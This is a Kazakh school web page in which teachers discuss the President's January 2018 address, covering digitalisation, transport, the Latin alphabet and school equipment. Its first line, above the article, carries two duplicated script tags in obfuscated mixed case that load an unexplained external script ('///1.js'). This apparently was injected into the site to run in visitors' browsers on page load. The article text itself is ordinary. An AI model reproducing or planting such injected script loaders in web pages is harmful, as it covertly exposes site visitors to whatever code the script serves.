<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

15.01.2018

Есенкелді орта мектебі мұғалімдерінің пікірлері

Біз 10  қаңтарда Қазақстан Республикасының Президенті Н.Ә. Назарбаевтың жыл сайынғы жолдауын тыңдап, талқыладық . Ондағы елбасының бастапқы тақырыбы  «Төртінші өнеркәсіптік  революция жағдайындағы жаңа мүмкіндіктері». Қазақстан әлемдегі түрлі сынақтарға төтеп беріп, қарқынды экономикалық даму жолына  бет алды.

Еліміздің 2050 жылға дейінгі ұзақ мерзімді стратегиясы жүзеге асырылды. 100 нақты  қадам  ұлт жоспары арасында біз реформамызды жүргізіп келеміз. Біз конституциялық реформаны жүзеге асырып,  еліміздің үшінші жаңғыруын бастадық. Рухани жаңғыру бағыты бойынша кешенді іс-шаралар жүргізілуде. Цифрлық Қазақстан бағдарламасы үкімет жағынан қабылданды. Өнеркәсіп кешенінің жаңа технологиялық деңгейін көтеру керек екендігін атап

айтты. Бұл ауыл шаруашылығында  еңбек өнімділігімен  өңделген өнім экспортын түбегейлі арттыруға тиіс деп атап кетті. Транспорт пен логастикалық инфоқұрылымды одан әрі дамытуымыз қажет. Цифрлық технологияларды енгізу мен интеллектуалды транспорт жүйесін құру жүк тасымалдау мерзімдерін қысқартуға және транзиттан түсетін табыстарды еселеуге мүмкіндік береді деді. 2025 жылға дейін білім берудің барлық деңгейінде латын әліпбиіне көшудің нақты кестесі әзірленеді. Өңірлердегі оқушылар сарайларының базасында компьютерлер, лабороториялар және 3D принтерлер секілді барлық қажетті инфақұрылымдармен жабдықталады. Білім беру бағдарламаларының негізгі басымдығы-өзгерістерге үнемі бейім болу және жаңа білімді меңгеру қабілетін  дамыту екенін айтып өтті. Біздің алдымызда үлкен міндет тұр, қиын міндет, бірақ та орындалатын!

 

 

 



Просмотров: 761


Пікір қосу



Деректерді қолтаңбаға қосу